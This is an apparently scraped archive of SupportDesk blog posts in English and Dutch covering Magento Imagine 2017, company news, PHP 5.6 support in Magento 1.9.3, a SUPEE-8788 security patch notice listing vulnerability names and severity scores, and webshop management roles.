    No, you can use this tool for every website. But the idea for Mage.coach is to make a plug-in system in which we write specific plug-ins to check specific Magento 1 and Magento 2 website features. So you can use the tool for every website but the generated advises are made specific for Magento websites, hence the name.

    Since its an open source program, what's the business model?

    There is no business model. Sitespeed.io and Magento are both open source programs. Open source software communities mostly depend on voluntary contributions, so this is my way to give something back to the community.

    Are there already similar concepts?

    The program is based on Sitespeed.io so, in a way, it is not original. But if you look at what the tool contributes, specifically on SEO, usability, and accessibility for Magento 1 and 2 websites, it is original.

    Where do you see Mage.coach in 1 year?

    The official launch of Mage.coach will be held on April 3rd during the Magento Imagine event at Las Vegas. Then we go from Private Beta to Public Beta. With the feedback we get from some experts at the event we hope to get the tool from public Beta to fully operational.
    So Next year, hopefully, The Mage.coach is fully operational, most of our Magento user will know us and we will be busy writing a lot of plugins to make analyzing specific Magento parts easier.

    Where do you see Mage.coach in 3 years?

    Mage.coach is fully functional and we have a large set of plugins for our customers so they can easily get in-depth insights into their website performances. I also think Magento will have a headless environment, so it will only work at the backend of the website. In this case, Mage.coach can help website owners optimizing their front-end by selecting the right codes.

    Do you want to know more about Mage.Coach ? Don't hesitate to contact Ray Bogman.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Magento Imagine 2017


    Magento Imagine 2017

    It's almost time! From 3-5 April, the annual Magento Imagine 2017- "Powering Tomorrow" event will be taking place. The biggest Magento event in the world will be organized in the Wynn hotel & Casino in Las Vegas. Over 2500 Magento commerce experts, from more than 45 countries will get together to get inspired, getting familiar with the latest technologies and developments, and of course to have fun!

    Road to Imagine

    And with the biggest Magento event in the world coming up, we as Magento fanatics, SupportDesk had to attend. That's why we send Ray Bogman and Vladimir Kerkhoff for the whole week to Los Angeles and Las vegas to get the Imagine 2017 Experience. Before the event starts in Vegas, there is a lot of Magento to experience in LA. So today Ray and Vladimir started will all kinds of "Road to Imagine" activities.

    These included both educational and sporting activities with other Magento enthusiasts. The day started at 05:00 with a 5k warming-up run as their preparation for the “Big Dam RunSunday, April 2nd. After, they went to de Magento Headquarters to meet the people who are going to ride the whole “RoadToImagine” by bike . A 600 mile journey from LA to Las Vegas. Starting this morning at 07:00.

    OroCommerce, OroCRM, OroPlafform

    After Meeting the team and wishing them good luck, Ray went on to the headquarters of ORO Inc for an inspiring talk with Yoav Kutner (Co-Founder & CEO of Oro Inc) and Dima Soroka (CTO at ORO Inc). He got new insights on how Oro sees itself in the near future and how the B2B market is growing in Europe, particular Germany. With that in mind we also got a glimpse at the new MarelloERP software, made by Madia in the Netherlands. It’s a new CRM software solution that is meeting retail needs and boosting business and makes the integration of OroCommerce and B2B easier. With the new Enterprise environment of OroCommerce it should be a perfect fit for the current and future market developments. We closed the session with a demo about the Oro Cloud edition, which is completely set up and managed internally with Oro’s own system and patch management. The service can be scaled up to large sizes and hopefully will come to Europe soon.

    Would you like to stay informed about Ray and Vladimir's latest Road to Imagine experiences? Check our daily "Magento Imagine 2017" blog at SupportDesk and/or follow Ray and Vladimir on twitter.

    Big Dam Run 2017

    Big Dam Run, preImagine

    The Magento "RoadToImagine" tour consists of all the activities Ray and Vladimir did from Friday till Sunday.

    On Friday they hang out with Anna Völkl, a 2 time Magento master from Austria, talking about the Magento developments in her country. At the end of the day, they met up with Alex Galtsow (from Atwix) and Sherrie Rhode (community manager at Magento), for dinner and to talk about the upcoming Imagine event.

    On Saturday is was time to drive to Las Vegas. On their way, they picked up Jan Brooijmans (Focusfwd.nl), who is currently working with Magento Business Intelligence a new concept of Magento. Jan told us some interesting new features of new Magento BI. To know more about the topic, click on Magento Business Intelligence. Finally arrived at the hotel in Las Vegas, they grabbed a quick bite and went to bed early because tomorrow the Big Dam Run will take place.

    The day before Magento Imagine and the start of the Big Dam Run, the first unofficial Magento event. Over 120 people signed in to run the 5K or 10K trail track over the Hoover Dam. Want to see how Ray and Vladimir crossed the finish? click here to check to see the pictures. After the run, they went back to the hotel to attend the Magento partners Summit. Here, all the Magento partners get informed about the in's and outs for Magento Imagine. After everybody was informed it was time to attend Magento Pre-Imagine, the second unofficial Magento Imagine event. This event, organized by Shipper HQ, Commerce Hero, and Mage Mojo, is the first reception to get connected with other Magento experts and enthusiasts.

    Monday 3 April - Day 1

    Monday, April 3rd. The official start of Magento Imagine. And with a full day packed with events, Ray and Vladimir started the day early with the first event, the continental breakfast & networking. After the breakfast, they visited a number of events. They described for us the most interesting ones;

    Magento Business Intelligence

    After taking over RJMetrics, a whole new concept of Business Intelligence has emerged. Keynote Speaker Robert Moore, Head of Magento Business Intelligence, told that with integrating RJMetrics with Magento, users can combine their Magento data with other sources to gain new insights, making data-driven strategies for online growth more accessible. Magento aims to get this integrated and fully operational by Magento 2.2.

    Technical Deep Dive; Magento Marketplace Extension Quality Program.

    In order to sell your extension in the Magento Marketplace, it must first pass the Extension Quality Program (EQP). But this takes time since most of the quality checking is done manually. With the new module, Magento has made the (EQP) automated and added an additional QA. Now after writing your extension, you can check it for yourself if it operates as expected and doest break any Magento functionalities so you can start selling the fast.

    Technical Deep Dive: Magento Commerce Order Management

    A new product, bought by Magento last year, is aimed at handling orders and linking warehouses as efficient as possible. This solution brings new omnichannel features, complex inventory management & order routing and, advanced payment tools to the table to steer your company towards the unique needs of your customers.

    Migrating from Magento 1 to Magento 2

    One of the most frequently asked questions, "How can I successfully migrate my Magento 1 web shop to >Magento 2?" In this session, James Cowie and Gordon Knoppe, talked about best practices for defining the migration strategy, share tips and techniques for code and data migrations and, talked about the use of the open source toolset. Do you want to know more about making the migration from Magento 1 to Magento 2 as time and cost efficiently? Contact Ray Bogman.

    The future of active Magento Cyber Security

    Magento introduces a new tool, the Magento Security and Auditing tool, which will be taking on security checks. The tool looks similar like Mage Report (Byte) but will be more automated, self-sufficient and will be performing security and auditing checks on a server level.

    Magento Enterprise Cloud Edition

    This session was all about learning new ways to develop, deploy, manage and optimize the new Magento Enterprise Cloud Edition (MECE). they saw a demonstration on how to optimize integrated business intelligence, management tools, and site delivery services.

    Ray and Vladimir also attended the following events;

    • User experience at Magento
    • Understanding total cost to migrate & implement Magento
    • Merchant to Merchant
    • Commerce conversations
    • Improving mobile conversion
    • Advanced marketing features of Magento 2

    The last event everyone attended to was the "opening night networking event", which was an awesome pool party. With a DJ and hundreds of Magento Imagine visitors, it was a successful closing session of the first Magento Imagine day.

    Did you see something interesting and want to know how these topics can help your website? Please don't hesitate to contact us

    Tuesday 4 April - Day 2

    Tuesday, April 4th was the second day of Magento Imagine 2017. As Usual Ray and Vladimir wanted to experience everything Magento Imagine had to offer so they started the day early with the 08:00 Breakfast & networking event. After they picked out their event schedule for this day they went to the first event.

    General session
    In this session, people got the general keynotes on the previous year of Magento. And it was quite a busy year for Magento, multiple takeovers and new products have been developed since 2016. The keyword below are some of the main developments that Magento went through;

    • January 2016, Magento developed MCOM Magento Commerce Order Manager.
    • April 2016, Magento Marketplace.
    • August 2016, Magento took over RJMetric formerly known as Magento Business Intelligence.
    • December 2016, Magento took over Bluefoot and created the new Magento CMS platform.

    The growth Magento has been trough was also remarkable. Being the #1 digital Commerce Platform Provider for the fourth straight year and #2 in the top 300 B2B providers (Internet Retailer), growth has been non-stop at Magento. 14 billion dollars in revenue are created by Magento Systems and there are over more than 500.000 Magento web developers.

    After the General Session Ray and Vladimir visited several keynote speakers:

    Canon Australia

    Aman Bhalla, Senior Manager digital Commerce of Canon Australia, told how Canon's E-Commerce went to completely integrate sales of products, services, and experiences personalized to shopper needs, by using Magento.

    Stella & Dot

    Jessica Herrin, CEO of Stella & Dot, introduced her new book "Find your extraordinary" at this event. Inspiring everyone about her entrepreneurial road, from a small company to a multi-million dollar industry. She closed her session springing and invigorating the room with telling which 7 traits a successful entrepreneur should have.

    After the Keynotes Ray and Vladimir went to the last General session of day 2. This session's theme was about the Magento Awards. Awards were handed for Best omnichannel of the year, growth award, commerce marketer of the year, best web design, best B2B user experience and much more.
    After the general awards, the Magento Master Awards came up. These awards are handed to members of the Magento community who contributed the most to the open source community.

    After the Awards there was some more in-depth information about;

    • Using Magento Headless, were Magento solely works on the back-end and Drupal at the front-end.
    • Progressive web apps and the applicability for Magento 2.
    • The new Magento Marketplace.

    The session ended with Keynote speaker Serena Williams. She talked about how she turns every challenge in an opportunity, her approach to building a personal brand and her philosophy for success.

    The last event of day 2 was the "Legendary Magento Evening Event". This because of the 7th successful edition of Magento Imagine. A big pool party at the casino was organized, with a James Bond fitting theme (007). This party lasted until the early hours. and Ray and Vladimir were certainly attending.

    Wednesday 5 April - Day 3

    The last day of Magento Imagine 2017. By now a ritual, Ray, and Vladimir started the day with the Breakfast and networking event. After they went to the General session & keynote speakers. After they visited an inspiring interview with Roy Rubin, Co-founder and former CEO of Magento it was time to reveal the upcoming plans for next year. And in the range of new products and businesses for 2017, Magento has surpassed everybody's expectations. In a global overview, this is what's waiting for us:

    Magento B2B is ready for use.

    Soon the new release will launch. With already 70% of the B2B market using Magento as the B2B platform this new release will certainly be a big addition.

    Magento Business Intelligence is coming up.

    Magento Social is in development.

    Transferred from RJMetrics Business Intelligence, this is a completely new service. This tool will make sharing your shop with online marketplaces real easy, using the Magento Backend.

    Advanced E-Commerce (formerly Bluefoot CMS).

    With this acquisition, Magento hopes to empower Magento merchants to exert greater control and creativity over the digital experiences they deliver to their clients.

    Magento Shipping.

    "Focused on offering merchants the flexibility required to manage consumers’ quick shipping expectations, Magento Shipping helps merchants accelerate time to market, automate fulfillment, easily connect with global carriers, enhance loyalty by keeping delivery promises, and reduce costs by ensuring accurate billing with advanced packing intelligence ".

    Magento Collaborates with Adobe.

    For Magento Headless, Magento and Adobe are putting their hands together. Magento Headless will only work on the back-end, while Adobe will provide merchants the possibility add Headless Commerce and Progressive apps.

    Magento Commerce Order Manager (MCOM)

    Magento Commerce Order Manager will get an efficiency update. Making the data warehouse and payment system more extensive and efficient.

    After this impressive showcase of yet to come products and services, Ray and Vladimir went to the last two talks of the day. Here they got the latest in's and outs on how the Magento Front-end will look like with Magento 2 and what the new features will be. The second talk was about optimizing Magento Cloud Services, in combination with Blackfire. Here everyone got the latest tips and tricks for creating the most optimal Magento cloud environment.

    The last event of Magento Imagine 2017 was the DevExchange event. At this event, all visitors got an opportunity to ask questions to the expert about the topics covered this event.

    For Ray and Vladimit there was, however, one more event. For all the dutch Magento candidates, Byte organized a dinner to talk about everybody's findings of Imagine 2017, Magento hosting and Magento 2.

    See you all at Magento Imagine 2018 - April 23-25, Wynn Las Vegas

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

     

  • Tariefwijzigingen per 1 april

    SupportDesk logo

    SupportDesk zit sinds de oprichting in 2012 op het basistarief van 100 euro (exlc btw).
    In de afgelopen periode is er een hoop veranderd, waaronder de toegenomen vraag naar goede techneuten.
    Gezien de stijgende kosten op diverse vlakken, ontkomen ook wij er niet aan om hierin mee te gaan.

    Via deze weg willen we al onze klanten daarom informeren over een een tariefwijziging.
    Het nieuwe uurtarief zal per ingang van 1 April 2017 dan ook 125 euro (exlc btw) worden.
    Er zal net als voorheen ruimte blijven voor een mooie korting, dit is afhankelijk van de nieuwe paketten en eventuele afspraken onderling.

    Voor een uitgebreider overzicht van onze tariefwijziging, bekijk onze producten en diensten in onze shop. Mocht u nog verdere vragen hebben, neem dan gerust contact met ons op.

    meer info   of   

    Bel nu! 020 337 5961

    Wouter den OtterDit artikel is geschreven door Wouter den Otter, mede-oprichter van SupportDesk en vervult zijn rol als Algemeen Directeur.

    LinkedIn

  • SupportDesk werkt met Qpep

    QpepDe gezondheid van het SupportDesk Team staat voorop en daarom is SupportDesk een unieke samenwerking aangegaan met Qpep.

    Eigenaresse Babette Hoogendoorn, voormalig topsporter en 7-voudig Nederlands kampioene squash, is een health & performance coach en heeft een filosofie ontwikkeld op het gebied van presteren waarin het ontwikkelen van de lichaamsbewustheid centraal staat.

    Lichaamsbewustheid is het (h)erkennen van signalen van het lichaam en in staat zijn dit toe te passen in werk en leven. Doordat steeds meer werk met het hoofd gebeurd is de lichaamsbewustwording echter steeds meer op de achtergrond gaan liggen. Moeite met ontspannen, gas terugnemen, slecht luisteren naar het lichaam en zelfs een burn-out kunnen de gevolgen zijn.

    Het komende jaar zal Babette dan ook betrokken zijn bij SupportDesk als health & performance coach. Doormiddel van diverse workshops, verspreid over het jaar, zal ze ons klaarstomen voor;

    • Omgaan met piekbelasting.
    • Doseren van energie.
    • Werken aan herstel.
    • Effectief omgaan met druk & stress.
    • De samenhang tussen lichaam, geest en hoofd

    SupportDesk slaat de handen ineen met Qpep.

    Hiermee is SupportDesk in staat preventief te werk gaan om medewerkers te behoeden voor een burn-out, de signalen te herkennen en een gezondere werkomgeving te bieden.

    Ook benieuwd wat Qpep voor uw bedrijf of individueel kan betekenen?
    Neem eens een kijkje op de website http://www.qpep.nl/

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Event: E-commerce Conference

    Magento 2 - E-commerce ConferenceNieuw jaar, nieuwe kansen! Net zoals wij voor onszelf elk jaar nieuwe voornemens in gedachten hebben, geldt dit waarschijnlijk ook voor jouw online business. Maar wat vliegt de tijd alweer. Januari is net een week aan zijn einde gekomen en hoe zit het met die goede voornemens? Wil jij in 2017 (nog) meer rendement uit jouw online business halen? Dan hebben Isatis Online Results en SupportDesk.nu goed nieuws voor heel online ondernemend Nederland. In 2017 slaan we de handen ineen en trappen we af met de gratis toegankelijke E-commerce Conference.
    Tijdens het event behandelen de specialisten van Isatis Online Results en SupportDesk.nu de volgende thema’s:

    • Wat is de impact van de mobile first ontwikkeling en de intrede van Google’s Accelerated Mobile Pages (AMP) op SEO-rankings in 2017?
    • Waarom is branding belangrijker dan ooit voor je webshop?
    • Welke rol speelt mobiel bij de customer journey en hoe kun je daarop inspelen met je business?
    • Wat kan Magento 2 in 2017 voor jouw webshop betekenen? En kun je als onderneming zomaar migreren naar Magento 2 met behoud van bestaande koppelingen en interfaces?

    We bespreken het allemaal tijdens de E-commerce Conference!

    Save the date

    Datum: donderdag 9 maart 2017
    Locatie: van der Valk Hotel Nijmegen-Lent
    Tijdstip: 16.00 tot 19.00 uur

    Inschrijven

    Jij wilt toch ook het maximale halen uit je online business in 2017? Schrijf je daarom vandaag nog gratis in voor de E-commerce Conference. Wees er snel bij, want er is een beperkt aantal plekken beschikbaar.

    Meld je nu aan!

    NB: Inschrijven is mogelijk tot en met zondag 26 februari. Tevens staat het de organisatie vrij om bij onvoldoende aanmeldingen het event te annuleren.

    We zien je graag 9 maart!

    meer info   of   

    Bel nu! 020 337 5961

    Rachel Tjong-A-HungDit artikel is geschreven door Rachel Tjong-A-Hung, onze spin in het web als support/ticket Manager.

  • Magento User Group: Ken je (e)commerce buren/Know your (e)commerce Neighbours

    Magento User Group AmsterdamDe Magento User Group (opgericht door Ray Bogman) begint al aan zijn 7de jaar, en was de eerst in Nederland. Afgelopen jaren is er veel gebeurd op Magento gebied en zijn er gelukkig vele nieuwe Magento User Groups in Nederlands er bij gekomen.

    Ǹu werken we allemaal samen onder een paraplu, begeleid door Dutchento, het Magento honk voor Nederland en organisator van Meet Magento (ps. boek nu al 10 Mei 2017 in je Agenda voor #MM17NL). Mede dankzij deze kracht bundeling kunnen er nu vakers Magento User Groups plaats vinden en sessies gedeeld worden.

    Om het jaar daarom dan ook goed te beginnen gaan we in de eerste sessie van 2017 op 2 Maart in ons nieuwe gebouw in Amsterdam-Zuidoost (Hogehilweg 19) met veel plezier aan de slag. Dit jaar zullen we samen met JMango360 voor de regio Amsterdam een leuk programma gaan opstellen.

    Ken je (e)commerce buren/Know your (e)commerce Neighbours

    Afgelopen jaren is er veel gebeurd in wereld van online verkopen. Veel nieuwe online webwinkels zijn er bij gekomen, groot en klein. Waar de een klein begonnen is en doorgegroeid is rukken er ook grote jongens op en nemen de markt over.

    Kortom wat staat ons de komende jaren te wachten en welke kennis kunnen we met elkaar delen zonder iedereen direct als concurrent te zien.

    Een mooie stelling welke ik onlangs zelf tegen kwam is de belemmering van de technisch doorgroei. Met een blijvend te kort aan kennis/mensen zal het op termijn voor sommige webwinkels bijna niet meer mogelijk zijn om het hoofd boven water te houden. De techniek groeit door maar is voor de kleine ondernemer straks niet meer te betalen, of komen zijn wensen boven op de stapel van de vele wijzigingen andere webwinkels hebben.

    Is dus straks de ondernemer die het meest kan betalen de winnaar of maken we de markt straks met z'n alle kapot en is de klant de enige die lacht.

    Discuseer mee, wat zijn jouw online doelen, welke tools, software pakketten gebruik je? Hoeveel technisch mensen heb je (intern) of elders besteed? Hoe deel je de kennis? Hoe ga je om de doorontwikkeling van je webshop? Heb je een roadmap?

    Kortom genoeg om over mee te praten.

    Save the Date

    Datum: 2 Maart 2017
    Locatie: Hogehilwegweg 19
    Tijdstip: 19:00 (inloop vanaf 18:30)

    RSVP, klik hier! Pizza en Bier staat klaar ;-)

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • SupportDesk is verhuisd

    SupportDesk verhuisd!

    SupportDesk groeit en groeit!
    Het gaat goed met SupportDesk. Zo goed zelfs, dat wij de afgelopen maanden diverse nieuwe collega’s hebben mogen verwelkomen. Zij hebben ons op alle vlakken versterkt, van front-end development tot after-sales support.

    Al deze groei zorgde er wel voor dat het erg krap werd in ons huidige pand. Wij kunnen dan ook met trots melden dat wij vanaf 1 december onze intrek hebben genomen in een nieuw pand aan de Hogehilweg 19 in Amsterdam Zuidoost.

    Groter, moderner...

    In het nieuwe pand hebben wij ons eigen gedeelte in gebruik op de 4e verdieping. Dit is verdeeld over diverse ruimtes die we flexibel zullen gebruiken.

    We maken gebruik van het concept Ovvice, hierdoor hebben we niet alleen alle gewenste faciliteiten op kantoor, maar ook nog eens de beschikking over flex-plekken en meeting rooms in Rotterdam, Apeldoorn en Arnhem.

    … en beter bereikbaar

    Het nieuwe pand ligt vlakbij knooppunt Holendrecht en is bereikbaar via de A2 en de A9. Voor klanten is er bij het pand parkeergelegenheid beschikbaar.

    Ook met het openbaar vervoer zijn wij goed bereikbaar: vanaf station Amsterdam Arena is het 5 minuten lopen en het metrostation Bullewijk ligt op 2,5 minuten afstand van het kantoor.

    Bezoekadres Magento User Groups

    De Magento User Groups van de Magento User Group Noord Holland verhuizen met ons mee!

    De eerstvolgende Magento User Group zal plaatsvinden in het begin van 2017, hierover volgen nog updates.

    Kom je een keer koffie drinken?

    meer info   of   

    Bel nu! 020 337 5961

    Wouter den OtterDit artikel is geschreven door Wouter den Otter, mede-oprichter van SupportDesk en vervult zijn rol als Algemeen Directeur.

    LinkedIn

  • Magento 1.9.3.x vs PHP 5.6

    Magento 1.9.3 vs. PHP 5.6Since the early days of Magento 1.x we are used to use PHP.

    It all started with PHP 5.3 back in 2008. This PHP version was not the holy grail and had some major security issues and performance drawbacks. PHP 5.3 became end-of-life in August 2014. The fact that lots of Magento 1.x websites are still using this on a production environment maybe not be a good idea to go forward.

    Early March 2012 PHP introduced 5.4 and PHP 5.5 in June 2013. Both where much better on security and performance. The Magento performance increased running on PHP 5.5 version and was around 20% better than all previous versions.
    Nowadays the majority of Magento 1.x shops are properly using PHP 5.5, but are not aware that this PHP version is also end-of-life since July 2016. This means no new security and bug updates are being released by Zend PHP, the maintainer of PHP. Lucky vendors like Ubuntu/Debian are maintaining there own distribution of PHP (known as a fork) on all TLS (longtime support) versions.

    Up until now all current versions of Magento 1.9.2.x (and lower) only supported PHP 5.5 (and lower). There was no official support for the latest PHP version 5.6, 7.0 or 7.1 on Magento 1.x.

    HHVM vs PHP

    In the middle of 2015 lots of debate was going on, what to use, PHP or HHVM. HHVM (HipHop virtual machine) was created by Facebook and was a state of the art new processor for PHP like code. And since all PHP version up until now where not performing great (understatement) Magento 1.x engineers started using HHVM on production. This was the first great alternative in a while. But it never officially got supported by Magento. So some Magento 1.x shop benefited while others where not able to use this, due to their Magento hosting environment or Magento module incapably.

    So the hype running HHVM was only short. Lucky Zend PHP was working back then on PHP NG (Next Generation) and noticed the power of HHVM and converted there PHP NG to PHP 7.0.  A brand new start of the PHP stack (ps. PHP 6 was never released, trivia ;-) ).

    While working on PHP 7.0 the latest build from the PHP 5.x branch is know as PHP 5.6 (last of its kind).
    So the current PHP 5.6 version is available as of now and will be maintained until December 2018 for security releases before it reaches it's end-of-life status.

    Magento 1.9.3.x and PHP 5.6

    In October 2016 Magento released a brand new version of the 1.9.x stack. Magento version 1.9.3.x which will be supporting PHP 5.6. This is great news for all merchants who are not ready to start a migration to Magento 2.x. And the PHP 5.6 version will be supported until the end of 2018 which is the same for Magento 1.x which is supported until November 2018. Merchants now will have some time left and get the maximum ROI on there Magento 1.x setup. In the meanwhile it's still advised pre-prepping for the new Magento 2 journey.

    Moving to Magento 2 is not a easy task and not being an upgrade with a single button click, but a migration which need to be well thought true. Although the name of the software is the same, the technical infrastructure is not. An average migration project for Magento 2 could take up to 6 months or more depending on the requirements and available recourses.

    So enjoy Magento 1.x while you can, but always plan for the future!

    PHP is a server-side scripting language designed primarily for web development but is also used as a general-purpose programming language.
    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento Security Update SUPEE-8788

    securityrelease

    Onlangs zijn er 17 veiligheidslekken in Magento ontdekt en opgelost in een patch SUPEE-8788. De lekken zijn aanwezig in alle versies van Magento t/m 1.9/x, dus zowel Magento Community als Magento Enterprise shops hebben hiermee te maken. Officieel zijn er enkel patches beschikbaar vanaf 1.5 en hoger, maar het betreft hier een issue dat impact heeft op alle versies.  

    Wat zijn de 17 lekken van SUPEE-8788?

    • APPSEC-1484 - Remote Code Execution in checkout
      • CVSSv3 Severity: 9.8 (Critical)
    • APPSEC-1480 - SQL injection in Zend Framework
      • CVSSv3 Severity: 9.1 (Critical)
    • APPSEC-1488 - Stored XSS in invitations
      • CVSSv3 Severity: 8.2 (High)
    • APPSEC-1247 - Block cache exploit
      • CVSSv3 Severity: 7.7 (High)
    • APPSEC-1517 - Log in as another customer
      • CVSSv3 Severity: 7.5 (High)
    • APPSEC-1375 - Remote Code Execution in admin
      • CVSSv3 Severity: 6.5 (Medium)
    • APPSEC-1338 - Full Page Cache poisoning
      • CVSSv3 Severity: 6.5 (Medium)
    • APPSEC-1436 - XSS vulnerability in URL processing
      • CVSSv3 Severity: 6.1 (Medium)
    • APPSEC-1211 - XSS in categories management
      • CVSSv3 Severity: 6.1 (Medium)
    • APPSEC-1058 - GIF flooding
      • CVSSv3 Severity: 5.3 (Medium)
    • APPSEC-666 - Cross-site scripting in Flash file uploader
      • CVSSv3 Severity: 5.3 (Medium)
    • APPSEC-1282: Filter avoidance
      • CVSSv3 Severity: 4.9 (Medium)
    • APPSEC-327 - CSRF in several forms
      • CVSSv3 Severity: 4.7 (Medium)
    • APPSEC-1189 - CSRF on removing item from Wishlist or Address Book
      • CVSSv3 Severity: 4.7 (Medium)
    • APPSEC-1478: Session does not expire on logout
      • CVSSv3 Severity: 4.2 (Medium)
    • APPSEC-1106 - Lack of certificate validation enables MitM attacks
      • CVSSv3 Severity: 3.7 (Low)
    • APPSEC-995 - Timing attack on hash checking
      • CVSSv3 Severity: 3.7 (Low)

    Magento 1.9.3.0 update

    Magento adviseert om spoedig alles te update naar de laatste versie, Magento 1.9.3.0 of de patch toe te passen. Met de komst van 1.9.3.0 zijn tevens meer dan 120 verbetering beschikbaar. De security patch staat in deze dus los van een eventueel upgrade naar Magento 1.9.3.0.

    De nieuwe Magento 1.9.3.0 update beschikt oa. over de volgende verbeteringen.

    • PHP 5.6 ondersteuning (PHP 5.5 is nl EOF "End Of Life")
    • BTW Calulatie
    • Winkelmandje en Checkout problemen
    • Catalogus
    • Prijs regels
    • Configurable color swatches
    • Import/export
    • Indexer performance problemen
    • En vele andere fixes...

    Zo te lezen is Magento 1.9.3.0 dus niet zo maar een upgrade, maar weer een nieuwe versie met zowel vele security, performance en algemene verbeteringen.

    Wat moet ik doen om Magento Security issues te bestrijden?

    Wij raden onze klanten zo spoedig mogelijk te patchen.

    Wij doen dat graag voor u. Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.

    Via de Magento download website is het mogelijk de Magento security patch SUPEE-8788 te installeren. Maak altijd eerst een backup van de database en bestanden voor de patch wordt geïmplementeerd.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento beheer: wat is een geslaagd recept?

    Magento beheer: wat is een geslaagd recept?

    Inleiding: wie-doet-wat.nu

    Niet zo lang geleden gingen wij aan de slag met een nieuwe klant en zijn Magento webshop wie-doet-wat.nu. Na het succesvol migreren van de Magento webshop naar een andere hoster, het fixen van diverse kleine bugs en het verbeteren van de performance, wilden we aan de slag gaan met het echte werk. Helaas werd op dat moment een hack geconstateerd. Klant in paniek! Hoe had dit kunnen gebeuren en waarom hadden we dit niet gelijk geconstateerd? En natuurlijk ook, wie is verantwoordelijk? In de stress van een gehackte Magento shop-situatie was er dus ook nog veel discussie en gewijs naar elkaar. Dit hielp niet in het vinden van de snelste oplossing. Herkenbaar?

    Sinds het oprichten van SupportDesk hebben we gemerkt dat we regelmatig in discussies terecht komen met klanten, leveranciers en met elkaar over de diverse taken en verantwoordelijkheden die in onze ogen horen bij het goed beheren en gebruiken van een Magento webshop. Om hier wat meer inzicht in te geven wil ik graag ingaan op een aantal relevante onderwerpen.

    Magento webshop: de bestandsdelen

    Elke operationele Magento installatie bestaat uit een aantal onderdelen, zowel essentiële als geadviseerde onderdelen. Technisch gezien heb je over het algemeen:

    • Een server, over het algemeen ingericht met een LAMP-stack
    • Een Magento installatie
    • Een database
    • Diverse third-party extensies
    • Aanpassingen door de bouwer(s)
    • Koppelingen met externe systemen(ERP, CRM, etc.)
    • Geautomatiseerde processen zoals cronjobs

    Al deze techniek heeft natuurlijk een doel, een functie. Als je op deze manier kijkt naar een Magento webshop bestaat deze functioneel gezien over het algemeen uit:

    • Een Magento Front-end(de online winkel)
    • Een Magento Back-end(beheertools)
    • Diverse third-party extensies(functionele uitbreidingen)
    • Analytics en rapportages

    Volledige functionaliteiten overzicht: hier

    En al deze functionaliteiten moeten natuurlijk zo goed mogelijk ingezet worden. Daarbij kun je denken aan de volgende taken:

    • beheren van producten en prijzen
    • beheren van de werkprocessen
    • beheren van klantcommunicatie
    • beheren van klanten
    • beheren van SEO/SEA
    • beheren van de rollen/rechten
    • beheren van de applicatie(s)
    • beheren van de server(s)
    • beheren van de data(base(s)
    • beheren van de middleware

    Magento webshop beheer: aan de slag!

    Wanneer iemand begint op de spreekwoordelijke zolderkamer zal hij/zij dus al deze taken op zich nemen. Naarmate de zolderkamer te krap wordt, zul je zien dat de bovengenoemde taken overgedragen gaan worden naar diverse specialisten. Er wordt bv. een hoster gevraagd om de server te hosten, een marketing specialist voor de adwords campagnes en SupportDesk voor het technisch beheer van Magento.

    Wat er echter heel vaak gebeurt, is dat bovengenoemde taken niet expliciet worden overgedragen. Er worden (vaak achteraf) verwachtingen uitgesproken met als belangrijkste strekking: Dat zouden jullie toch doen? Zo zien wij bv. vaak dat de hoster wordt aangesproken op het traag werken van de Magento installatie, terwijl het probleem bv. zit in foutieve code in third party extensies. Of de marketing specialist wordt aangesproken op de incorrecte implementatie van de content. Voor zowel klanten als leveranciers kan dit leiden tot enorme verwarring, inefficiency, frustraties, etc.

    Wie-doet-wat.nu

    Om ervoor te zorgen dat er duidelijkheid is in de taakverdeling en verantwoordelijkheden is er eigenlijk altijd voor een driedeling gekozen:

    • Functioneel beheer
      Functioneel beheer houdt zich bezig met het beheren van de informatievoorziening in een organisatie
    • Technisch beheer
      Richt zich op het in stand houden, beheren en onderhoud van de IT-infrastructuur
    • Applicatie beheer
      Onder dit beheer wordt verstaan het in stand houden van de bedrijfsapplicaties en data van de organisatie

    Diverse links:


    Dat klinkt op zich logisch, maar is natuurlijk nog steeds erg theoretisch. Een webshop-eigenaar wil zich vooral bezig houden met zijn winkel en zit niet te wachten op een cursus ITIL. Wat ik daarom adviseer is om ervoor te zorgen dat je met alle betrokken partijen om tafel gaat of in ieder geval vastlegt welke verantwoordelijkheden en taken er zijn en deze aan de hand van deze driedeling verdeelt. Over het algemeen kun je nl. stellen dat alles wat hoort bij de server valt onder de hoster en daarmee kun je afspreken om de hoster als technisch beheerder aan te stellen.

    Ditzelfde kun je doen voor de applicatie(Magento). Dit hoort over het algemeen bij de bouwer/beheerder. Maar nu het belangrijkste, wie is de functioneel beheerder? Want je hebt een snelle server, een goed draaiende magento webshop. Wie bestuurt dit mooie apparaat? Zolang dit niet besproken is, zal dit altijd de webshop-eigenaar zelf zijn. Deze eigenaar kan natuurlijk wel deze functionele beheer-rol in diverse taken overdragen. Wat voorop staat is dat de eindverantwoordelijkheid in de basis daar gezocht moet worden. Een geslaagd recept is daarom vooral eentje die goed is vastgelegd en zo concreet mogelijk is. Je kunt hier bijgeleverd invuldocument voor gebruiken.

